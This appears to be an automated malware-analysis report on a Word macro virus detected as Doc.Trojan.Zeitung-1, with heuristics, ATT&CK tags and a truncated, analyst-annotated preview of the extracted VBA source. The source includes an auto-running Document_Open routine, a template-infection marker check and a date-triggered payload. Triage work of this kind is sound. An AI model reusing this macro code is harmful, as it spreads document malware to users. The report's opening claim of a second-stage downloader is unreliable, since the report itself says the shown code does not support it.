MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
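The file contains a malicious VBA macro that is automatically executed by the Document_Open subroutine. This macro is designed to download and execute a second-stage payload, as indicated by the ClamAV detection 'Doc.Trojan.Zeitung-1' and the presence of VBA code that manipulates the NormalTemplate and ActiveDocument VBProjects. The macro's intent is to compromise the user's system by fetching and running additional malicious code. Note that the script preview below does not itself show download or process-execution calls. The visible portion contains a marker check (Kontaminat, keyed on the constant "VirusZeitung"), a date-dependent probability gate, and code that creates a new document and types text into it, which appears more consistent with a document-infecting macro virus working through the Normal template than with a downloader. The preview is truncated, so the second-stage claim should be confirmed against the full macros.bas before it drives response decisions.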
Heuristics 3
-
ClamAV: Doc.Trojan.Zeitung-1 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Zeitung-1
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30345 bytes |

SHA-256: 3fa2dc84df7e93872c9b96b35173d7e19942761803785392b8ff0978de372db1
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Const Signature = "VirusZeitung" '耔沩囹箴?忤痼襦
'梵 钿?狸溟皂疴觊 腙噤 翦? 栲胴螂釦吗耨玎?疣?栲羼?厘耥鹋痨忤条?噜
'2
'眍戾?2 玎 2000 泐
' NOTE(review): analyst comments are kept below this point on purpose. Kontaminat reads
' code-module line 3, which appears to be the "'2" line above (Attribute lines are
' presumably not counted as module text - confirm), so inserting lines above it would
' change what the sample's own check parses.
' Signature is the marker string that Kontaminat searches for in a code module.
' NOTE(review): the non-ASCII comment text above is mis-encoded in this extraction
' (presumably Cyrillic shown through the wrong code page - confirm by re-decoding the
' original sample); it is left untouched as evidence.
' Module-level state. Only reg is declared Boolean; sd has no As clause, so VBA makes
' it a Variant.
Dim sd, reg As Boolean
' Kontaminat: reports whether the code module of O already contains the Signature marker
' and, if it does, returns the number stored on that module's third line.
'   O - an object exposing .codemodule (presumably a VBComponent such as the nt/ad
'       objects set in Document_Open - confirm against the callers).
' Returns:
'   0     - marker not found, or the module has fewer than 50 lines
'   n     - Val() of line 3 (after dropping its first character) when that is below 65535
'   -1    - marker present but the parsed value is 65535 or more
' Analyst note: the marker constant and the numeric line-3 comment are fixed strings, so
' they are useful to look for when triaging other documents or the Normal template.
Private Function Kontaminat(O)
' Search is bounded to lines 1-100, columns 1-100 of the module.
If Not O.codemodule.Find(Signature, 1, 1, 100, 100) Then
Kontaminat = 0
Else
' A short module is treated the same as an unmarked one.
If O.codemodule.countoflines < 50 Then
Kontaminat = 0
Else
' Read module line 3 and strip surrounding whitespace.
Ant$ = Trim(O.codemodule.lines(3, 1))
' Drop the first character (the leading apostrophe, if line 3 is a comment like "'2").
Ant$ = Trim(Mid(Ant$, 2, Len(Ant$) - 1))
' Val() yields 0 for non-numeric text, so that case is indistinguishable from "not marked".
If Val(Ant$) < 65535 Then
Kontaminat = Val(Ant$)
Else
Kontaminat = -1
End If
End If
End If
End Function
Private Sub Document_Open()
On Error Resume Next
Dim ad, nt As Object
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
If Mid(ActiveDocument.Name, 1, 12) = "冷耜栝 钽铐? Then
Exit Sub
End If
reg = False
p = 0.05
Tag$ = ""
Monat$ = ""
datum$ = Trim(Date)
i = 1
While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
Tag$ = Tag$ + Mid(datum$, i, 1)
i = i + 1
Wend
i = i + 1
While (Mid(datum$, i, 1) <> ".") And (i < Len(datum$))
Monat$ = Monat$ + Mid(datum$, i, 1)
i = i + 1
Wend
If (Val(Monat$) = 2) And (Val(Tag$) = 2) Then p = 2 ' 2 翦怵嚯�
If (Val(Monat$) = 3) And (Val(Tag$) = 21) Then p = 2 ' 21 爨痱
If (Val(Monat$) = 4) And (Val(Tag$) = 30) Then p = 2 ' 30 囡疱?
If (Val(Monat$) = 6) And (Val(Tag$) = 21) Then p = 2 ' 21 棹?
If (Val(Monat$) = 8) And (Val(Tag$) = 2) Then p = 2 ' 2 噔泱耱
If (Val(Monat$) = 9) And (Val(Tag$) = 21) Then p = 2 ' 21 皴眚�狃�
If (Val(Monat$) = 10) And (Val(Tag$) = 31) Then p = 2 ' 31 铌?狃�
If (Val(Monat$) = 12) And (Val(Tag$) = 21) Then p = 2 ' 21 溴赅狃�
If Rnd >= p Then
Exit Sub
End If
Documents.Add Template:="Normal", NewTemplate:=False
With ActiveDocument.PageSetup
.LineNumbering.Active = False
.Orientation = wdOrientPortrait
.TopMargin = CentimetersToPoints(1.5)
.BottomMargin = CentimetersToPoints(1.5)
.LeftMargin = CentimetersToPoints(2.5)
.RightMargin = CentimetersToPoints(2)
.Gutter = CentimetersToPoints(0)
.HeaderDistance = CentimetersToPoints(1.25)
.FooterDistance = CentimetersToPoints(1.25)
.PageWidth = CentimetersToPoints(21)
.PageHeight = CentimetersToPoints(29.7)
.FirstPageTray = wdPrinterDefaultBin
.OtherPagesTray = wdPrinterDefaultBin
.SectionStart = wdSectionNewPage
.OddAndEvenPagesHeaderFooter = False
.DifferentFirstPageHeaderFooter = False
.VerticalAlignment = wdAlignVerticalTop
.SuppressEndnotes = False
.MirrorMargins = False
End With
Druck_0 "?????? ?????, 40, True, wdAlignParagraphCenter, 0, False"
Druck_0 "妈痼耥? 汔珏蜞 皴牝?桁. 逆. 蔫 ?? 叔腚?", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "蔓躅?镱 戾疱 觐祜脲牝钼囗? 眍戾疣", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "10 爨� 2000 ? ?2 (2)", 18, False, wdAlignParagraphLeft, 0, True
Selection.TypeParagraph
Druck_0 "彦泐漤� ?眍戾疱:", 18, True, wdAlignParagraphLeft, 0, True
Druck_0 "* 添屙? 麒蜞蝈脲??汔珏蝈. (项溽铕赅 桧蝈疴��)", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "* 橡邃腩驽龛� 镱 箅篦�屙�?疣犷螓 汔珏螓:", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "** 帖 耦忮瘌屙耱怏屐 疋铋 忤痼?", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "** 袜耔朦眍 扈?礤 狍溴��.", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "** 砚铋 忤痼?- 疋铊扈 痼赅扈. ", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "** 帖 - 忄? 恹 - 磬?(?镳钺脲爨?钺疣蝽铋 疋�玷). ", 18, False, wdAlignParagraphLeft, 0, True
Druck_0 "* 袜�� 镫囗?", 18, False, wdAlignParagraphLeft, 0, True
Selection.TypeParagraph
Druck_0 "******************************", 18, True, wdAlignParagraphCenter, 0, True
Selection.TypeParagraph
vb = 1
ve = 1
reg = True
vb = Artikel_B(nt, vb, 1)
ve = Artikel_E(nt, vb + 1)
Selection.TypeParagraph
Druck_0 nt.codem
... (truncated)
|
|||